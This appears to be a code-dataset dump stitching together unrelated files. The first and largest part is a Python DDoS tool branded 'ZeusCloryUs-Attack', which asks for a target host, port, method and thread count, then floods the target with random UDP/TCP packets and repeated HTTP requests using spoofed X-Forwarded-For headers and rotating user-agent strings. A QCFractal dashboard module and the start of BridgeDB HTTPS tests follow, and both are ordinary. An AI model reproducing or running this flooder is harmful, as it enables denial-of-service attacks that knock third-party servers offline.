'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n']
referers = [
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus', ]
print("""TUNGGU ZEUS CLORY OPEN KEY""")
time.sleep(5)
os.system("clear")
print("\033[95m")
print("""
ZeusCloryUs-Attack
""")
print("""\033[91m
||DONT ABUSE BRO ||
#==========================================#
| Follow My Sosmedia!!!! |
| AUTHOR : ZeusClory#3399 |
| github : https://github.com/ZeusClory |
| youtube : https://youtube.com/ZeusClory|
#===========================================#""")
print("\033[92m")
print("""
██╗░░██╗██████╗░██╗░░░██╗██╗░░░██╗██╗░░░██╗
╚██╗██╔╝██╔══██╗╚██╗░██╔╝██║░░░██║██║░░░██║
░╚███╔╝░██████╔╝░╚████╔╝░██║░░░██║██║░░░██║
░██╔██╗░██╔══██╗░░╚██╔╝░░██║░░░██║██║░░░██║
██╔╝╚██╗██║░░██║░░░██║░░░╚██████╔╝╚██████╔╝
╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░░╚═════╝░░╚═════╝░
██████╗░██████╗░░█████╗░░██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝
██║░░██║██║░░██║██║░░██║╚█████╗░
██║░░██║██║░░██║██║░░██║░╚═══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝
╚═════╝░╚═════╝░░╚════╝░╚═════╝░
""")
print("\033[95m")
print("""
•Режимы атаки|•
| UDP | TCP | GET |""")
print("\033[92m")
ip = str(input("[ ====> ] IP/HOST цели : "))
port = int(input("[ ====> ] Порт цели : "))
choice = str(input("[ ====> ] Метод (Get/TCP/UDP) : "))
times = int(input("[ ====> ] Ко-во пакетов : "))
threads = int(input("[ ====> ] Сколько потоков : "))
def udp():
data = random._urandom(800)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (str(ip), int(port))
for x in range(times):
s.sendto(data, addr)
print(+"\033[0;37;50m ATTACK IP %s \033[95mAND PORT %s WITH UDP" % (ip, port))
except:
print("\033[0;37;95m Zeus-Clory Attack IP %s \033[92m And Port %s" % (ip, port))
def tcp():
data = random._urandom(102489)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(data)
for x in range(times):
s.send(data)
except:
s.close()
print("\033[1;31;95m ATTACK IP %s AND PORT %s WITH METHOD TCP" % (ip, port))
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def Headers(method):
header = ""
if method == "get" or method == "head":
post_host = "POST /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
accept = random.choice(acceptall) + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
randomip = str(random.randint(1, 255)) + "." + str(random.randint(0, 255)) + "." + str(random.randint(0, 255)) + "." + str(random.randint(0, 255))
forward = "X-Forwarded-For: 1\r\n"
forward += "Client-IP: 10000\r\n"
length = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
header = post_host + referer + forward + useragent + accept + content + connection + length + "\r\n\r\n"
return header
os.system('color ' + random.choice(['D']) + " & cls & title ZeusClory [Ddos]")
def get():
header = Headers("get")
i = random.choice(("[*]", "[!]", "[#]"))
data = random._urandom(10299)
if choice == "1":
get_host = "GET /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
else:
get_host = random.choice(
['GET', 'POST', 'HEAD']) + " /Your_Server_Bypassed_By_ZeusCloey HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((ip, port))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(time):
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
print("\033[1;36;40m ATTACK IP %s ANF PORT %s" % (ip, port))
except socket.error:
s.close()
print("\033[1;36;40m ATTACK IP %s AND PORT %s" % (ip, port))
def start_zeus():
for y in range(threads):
if choice == 'UDP':
th = threading.Thread(target=udp)
th.start()
elif choice == 'TCP':
th = threading.Thread(target=tcp)
th.start()
elif choice == 'GET':
th = threading.Thread(target=get)
th.start() | 66.281081 | 366 | 0.612176 |
002431a429892ecd738e8089d6e1c677635924fe | 1,392 | py | Python | qcfractal/dashboard/index.py | yudongqiu/QCFractal | 43b5b4807dfe19f78177288f204aab1066de2dea | [
"BSD-3-Clause"
] | null | null | null | qcfractal/dashboard/index.py | yudongqiu/QCFractal | 43b5b4807dfe19f78177288f204aab1066de2dea | [
"BSD-3-Clause"
] | null | null | null | qcfractal/dashboard/index.py | yudongqiu/QCFractal | 43b5b4807dfe19f78177288f204aab1066de2dea | [
"BSD-3-Clause"
] | null | null | null | import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
from .app import app
from .navbar import navbar
from . import dash_managers
from . import dash_queue
from . import dash_service
body = dbc.Container(
[
dbc.Row([
dbc.Col(
[
html.H2("Overview"),
html.P("""\
Welcome to the QCFractal Dashboard which will give a high
level overview of the current state of the database.
"""),
dbc.Button("View details", color="secondary"),
],
md=4,
),
dbc.Col([
html.H2("Graph"),
dcc.Graph(figure={"data": [{
"x": [1, 2, 3],
"y": [1, 4, 9]
}]}),
]),
])
],
className="mt-4",
)
app.layout = html.Div([dcc.Location(id='url', refresh=False), html.Div(id='page-content')])
@app.callback(Output('page-content', 'children'), [Input('url', 'pathname')])
def display_page(pathname):
if pathname == '/manager':
return dash_managers.layout()
elif pathname == '/queue':
return dash_queue.layout()
elif pathname == '/service':
return dash_service.layout()
else:
return html.Div([navbar, body])
| 26.769231 | 91 | 0.545259 |
8432c2029ef5376b83d52ba91169b9459550664b | 15,663 | py | Python | bridgedb/test/test_https.py | emmapeel2/bridgedb | c91498a3287be9717e6a1203e60b9503ad537de8 | [
"BSD-3-Clause-Clear"
] | 4 | 2016-04-18T06:30:54.000Z | 2019-07-17T14:02:45.000Z | bridgedb/test/test_https.py | emmapeel2/bridgedb | c91498a3287be9717e6a1203e60b9503ad537de8 | [
"BSD-3-Clause-Clear"
] | null | null | null | bridgedb/test/test_https.py | emmapeel2/bridgedb | c91498a3287be9717e6a1203e60b9503ad537de8 | [
"BSD-3-Clause-Clear"
] | 1 | 2019-04-11T23:00:02.000Z | 2019-04-11T23:00:02.000Z | # -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: trygve <tor-dev@lists.torproject.org>
# :copyright: (c) 2014, trygve
# (c) 2014-2017, The Tor Project, Inc.
# (c) 2014-2017, Isis Lovecruft
# :license: see LICENSE for licensing information
#_____________________________________________________________________________
"""Integration tests for BridgeDB's HTTPS Distributor.
These tests use `mechanize`_ and `BeautifulSoup`_, and require a BridgeDB
instance to have been started in a separate process. To see how a BridgeDB is
started for our CI infrastructure from a fresh clone of this repository, see
the "before_script" section of the `.travis.yml` file in the top level of this
repository.
.. _mechanize: https://pypi.python.org/pypi/mechanize/
http://wwwsearch.sourceforge.net/mechanize/
.. _BeautifulSoup:
http://www.crummy.com/software/BeautifulSoup/bs3/documentation.html
"""
from __future__ import print_function
import gettext
import ipaddr
import mechanize
import os
from BeautifulSoup import BeautifulSoup
from twisted.trial import unittest
from twisted.trial.reporter import TestResult
from twisted.trial.unittest import FailTest
from twisted.trial.unittest import SkipTest
from bridgedb.test.test_Tests import DynamicTestCaseMeta
from bridgedb.test.util import processExists
from bridgedb.test.util import getBridgeDBPID
HTTP_ROOT = 'http://127.0.0.1:6788'
CAPTCHA_RESPONSE = 'Tvx74Pmy'
TOPDIR = os.getcwd()
while not TOPDIR.endswith('bridgedb'):
TOPDIR = os.path.dirname(TOPDIR)
PIDFILE = os.path.join(TOPDIR, 'run', 'bridgedb.pid')
PID = getBridgeDBPID(PIDFILE)
class HTTPTests(unittest.TestCase):
def setUp(self):
if not os.environ.get("CI"):
raise SkipTest(("The mechanize tests cannot handle self-signed "
"TLS certificates, and thus require opening "
"another port for running a plaintext HTTP-only "
"BridgeDB webserver. Because of this, these tests "
